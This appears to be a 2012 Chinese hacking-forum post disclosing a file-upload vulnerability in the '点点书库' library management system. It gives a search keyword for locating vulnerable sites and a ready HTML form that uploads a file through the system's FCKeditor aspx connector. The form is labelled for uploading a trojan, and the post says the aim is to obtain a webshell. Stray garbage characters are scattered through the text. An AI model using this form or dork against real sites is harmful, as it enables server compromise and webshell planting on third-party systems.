找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 点点书库图书馆系统文件上传漏洞
返回列表 发新帖
查看: 10521|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞4 U  G0 \3 ~2 \4 ^9 P+ w# Y3 O
作者:冰锋刺客
5 F, \2 l5 \8 W% [- C 厂商:点击书(dianjishu.com)
/ ^3 t  B/ @# g+ [; m 日期:2012-6-217 x2 f& I5 z, X8 f4 K

7 o  T2 W! B, W+ `I 概述
6 s1 V' D( r8 D. @; T7 t) D   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell& Q$ T% G& W, d* M, C: u) X  g
II 简介
1 U- l7 n# F: s. k  a   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"7 U; d. Q6 f& q( R, S$ ]
补充一个漏洞3 ~6 [$ _( k; C7 D# Z0 }
<form id="frmUpload" enctype="multipart/form-data"
0 S5 l8 M! F  z3 n3 y action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>) z1 S& u- y9 f+ z( j$ W$ I
<input id="btnUpload" type="submit" value="操翻他">
5 k! e/ M* V/ l </form>
% N. C0 x& g! ~3 n) Z" D* n8 o 你们懂的/ l$ I) V9 v, f! a2 a# z5 Z
那傻逼提供还需要改包.5 }+ l6 A/ l7 ~/ K
自己看了下源代码发现fckeditor
# q5 d& a2 k0 e5 N9 s( _ 直接秒杀
8 b: L: [  d( a! P, Z( K1 [& d
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表